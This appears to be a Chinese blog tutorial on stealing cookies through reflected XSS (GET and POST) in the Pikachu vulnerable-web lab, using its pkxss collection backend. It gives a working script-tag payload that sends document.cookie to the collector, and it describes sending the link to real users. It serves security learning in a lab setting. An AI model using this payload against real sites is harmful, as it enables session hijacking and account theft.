Web安全之利用XSS漏洞进行cookie获取

攻击者后台的搭建

首先我们搭建攻击者后台用于接收我们获取到的cookie信息,这里我们用的后台是是pikachu自带的pkxss后台

打开pikachu网址找到管理工具点开xss后台

接着再点击安装初始化即

点击进入首页,输入账号密码登入就完成了

get型xss:获取cookie


攻击流程图:

 这里我的攻击者服务器受害者服务器和漏洞服务器都为127.0.0.1:801

由于每个攻击者端口不同,这里我们要修改pkxss后台文件中的xampphtdocspkxssxcookie下的cookie.php文件

将其中的ip地址修改为漏洞服务器地址

 接着再另一个页面中打开pikachu登入到pkxss的后台

 接着开始get型xss的利用,打开pikachu的反射型xss(get)页面,这里我们准备一个js的payload

<script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

这段js代码利用DOM里面的document.location的实例来做一个重定向,一旦用户去访问页面这段js就会去访问我们pkxss的后台,访问时顺便把cookie给带过去

而且利用了DOM里面的document.cookie来获取本地的cookie(ps:反射型xss(get)输入框有字符数量限制,之前又说过如果解决)

然后将这段js代码输入提交即可

点提交之后页面跳到了首页,这时我们已经成功获取到了用户的cookie了

然后我们来到之前打开的pkxss页面,点开cookie搜集刷新一下页面

在实际场景当中我们可以把这段URL发送给用户,一旦用户在浏览器里面访问了这个链接,用户的cookie就会被发送到我们的后台

 post型xss:获取cookie

其实和反射型的xss一样的,只是提交post方式提交的,并不会在URL里面传送参数 ,所以我们无法将我们的恶意代码嵌到URL里面去发送给目标,我们可以在bp里抓包查看一下

攻击原理流程图

 首先我们点到反射型XSS(post)页面登入一下

接着pkxss的文件xampphtdocspkxssxcookie的post-html中的漏洞服务器器和攻击者服务器修改成我们的自己的地址

这样我们这个自动提交post表单的页面就构造好了

只要我们让用户点这个这个我们构造好的会自动提交post请求的表单就可以获取到用户cookie

http://127.0.0.1:801/pikachu/pkxss/xcookie/post.html

原文地址:https://www.cnblogs.com/DxyG/p/13252457.html